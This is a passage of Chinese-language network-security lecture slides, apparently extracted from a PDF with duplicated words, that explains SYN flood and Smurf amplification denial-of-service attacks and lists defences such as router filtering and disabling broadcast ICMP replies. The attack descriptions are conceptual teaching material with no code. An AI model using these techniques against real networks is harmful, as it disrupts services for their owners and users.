52、这样，受害者系统 还是可能耗尽系统资源，以导致其他种种问题。 攻击系统的位置几乎是不可确认的，因为SYN包中的源地址多数都是虚假的。当SYN包到达受害者系统的时候，没有办法找到他的真实地址 。SYN风暴攻击手段风暴攻击手段SYN风暴攻击过程风暴攻击过程 SYN-RCVDLISTEN伪造源地址的伪造源地址的SYN包包Port flooding occursCLOSEDCLOSED被动打开被动打开AB攻击者攻击者A目标主机目标主机BSYN + ACK 常用的防范方法包括5个方面： 1、优化系统配置： 缩短超时时间； 增加半连接队列的长度 关闭不重要的服务 2、优化路由器配置： 配置路由器的外网卡

53、配置路由器的内网卡分析与对抗分析与对抗 3、完善基础设施 4、使用防火墙： 5、主动监视分析与对抗分析与对抗 Smurf攻击是以最初发动这种攻击的程序名Smurf来命名的。这种攻击方法结合使用了IP欺骗和带有广播地址的ICMP请求-响应方法使大量网络传输充斥目标系统，引起目标系统拒绝为正常系统进行服务，属于间接、借力攻击方式。 任何连接到互联网上的主机或其他支持ICMP请求-响应的网络设备都可能成为这种攻击的目标。Smurf攻击攻击2 原理：攻击者伪造一个ICMP echo请求包，其源地址为目标受害者地址，目的地址为中间脆弱网络的广播地址，并将该echo请求包发送到中间脆弱网络。中间脆弱网络中

54、的主机收到该echo请求包时，会以echo响应包作为回答，而这些包最终被发送到目标受害者。这样大量同时返回的echo响应数据包造成目标网络严重拥塞、丢包，甚至完全不可用等现象。Smurf攻击手段攻击手段Smurf攻击手段攻击手段 攻击特征 涉及到三方：攻击者，中间目标网络，受害者 以较小的网络带宽资源，通过放大作用，吃掉较大带宽的受害者系统 Smurf放大器 Smurf放大器网络：不仅允许ICMP Echo请求发给网络的广播地址，并且允许ICMP Echo-Reply发送回去 这样的公司越多，对Internet的危害就越大Smurf攻击手段攻击手段 实施Smurf攻击 需要长期的准备，首先找到

55、足够多的中间网络 集中向这些中间网络发出ICMP Echo包Smurf攻击手段攻击手段 针对最终受害者 没有直接的方法可以阻止自己接收没有直接的方法可以阻止自己接收ICMP Echo Reply消息消息 在在路由器路由器上阻止这样的应答消息，但是，结果是，路由器本身遭受上阻止这样的应答消息，但是，结果是，路由器本身遭受了了DoS攻击攻击 与中间目标网络联系与中间目标网络联系 针对中间网络 关闭外来的关闭外来的IP广播消息，但是，如果攻击者从内部机器发起攻击，广播消息，但是，如果攻击者从内部机器发起攻击，仍然不能阻止仍然不能阻止smurf攻击攻击 配置操作系统，对于广播地址的配置操作系统，对于广播地址的ICMP包不响应包不响应Smurf攻击的防止措施攻击的防止措施 针对发起攻击的主机及其网络： 在路由器上配置其过滤规则，丢弃那些即将发到外部网而源在路由器上配置其过滤规则，丢弃那些即将发到外部网而源IP地址地址不具有内部网络地址的包。不具有内部网络地址的包。Smurf攻击的防止措施攻击的防止措施 SYN flooding和Smurf攻击利用TCP/IP协议中的设计弱点，通过强行引入大量的网络包来占用带宽。迫使弥补受害主机拒绝对正常的服务请求进行响应。利用处理程序错误进行攻击利用处理程序错误进行攻击3 原理：利用TCP/IP协议实现中的处理程序错误进行攻击，即故意错